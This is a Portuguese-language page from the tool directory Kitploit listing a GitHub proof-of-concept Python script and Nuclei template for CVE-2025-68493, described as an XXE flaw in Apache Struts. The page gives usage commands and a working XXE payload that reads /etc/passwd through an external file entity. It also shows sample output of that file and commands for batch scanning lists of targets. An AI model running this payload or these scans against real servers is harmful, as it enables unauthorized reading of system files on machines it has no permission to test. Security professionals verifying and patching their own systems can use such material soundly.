Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68493 — Script PoC em Python e template YAML Nuclei para detectar e explorar CVE-2025-68493, uma vulnerabilidade XXE no Apache Struts, permitindo leitura de arquivos e varredura em lote. | Kitploit
Ferramentas/GitHubGitHub/hsltz/cve-2025-68493
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubhsltz/cve-2025-68493

CVE-2025-68493

Script PoC em Python e template YAML Nuclei para detectar e explorar CVE-2025-68493, uma vulnerabilidade XXE no Apache Struts, permitindo leitura de arquivos e varredura em lote.

Ver Repositório
22há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-68493

CVE-2025-68493

7. Referências

[1] ApacheStrutsXWorkXML vulnerabilidade CVE-2025-68493 PoC e script | ZONE.CI Rede Global. https://zone.ci/secarticles/wx/486533.html

8. Verificação e Exploração da Vulnerabilidade

Para verificar e explorar a vulnerabilidade CVE-2025-68493, podem ser usados os seguintes scripts Python PoC e templates Nuclei YAML.

8.1 Método de Uso do Script Python PoC

Nome do script: cve_2025_68493_poc.py

Funcionalidade: Este script é usado para verificar a vulnerabilidade em um único alvo, tentando ler um arquivo especificado (padrão: /etc/passwd).

Pré-requisitos:

  • Ambiente Python 3
  • Biblioteca requests (pip install requests)

Parâmetros da linha de comando:

  • -u, --url: URL base da aplicação alvo (exemplo: http://127.0.0.1:8080)
  • -f, --file: Caminho do arquivo alvo a ser lido (padrão: /etc/passwd)

Exemplo:

python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd

Saída esperada:

Se o alvo for vulnerável e o arquivo for lido com sucesso, será exibido algo como:

[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------

8.2 Método de Uso do Template Nuclei YAML

Nome do template: cve-2025-68493.yaml

Funcionalidade: Este template é usado para realizar varreduras em lote em múltiplos alvos usando a ferramenta Nuclei, a fim de detectar a vulnerabilidade CVE-2025-68493.

Pré-requisitos:

  • Ferramenta Nuclei instalada (recomendado v3.x ou superior)

Parâmetros da linha de comando:

  • -t: Caminho do arquivo de template Nuclei
  • -u: URL de um único alvo
  • -l: Arquivo contendo URLs de múltiplos alvos

Exemplo:

Escaneando um único alvo:

nuclei -t cve-2025-68493.yaml -u http://example.com:8080

Escaneamento em lote:

Suponha que você tenha um arquivo chamado targets.txt, onde cada linha contém uma URL de alvo:

http://target1.com:8080
http://target2.com:8080

Execute o seguinte comando para realizar o escaneamento em lote:

nuclei -t cve-2025-68493.yaml -l targets.txt
Baixar ferramenta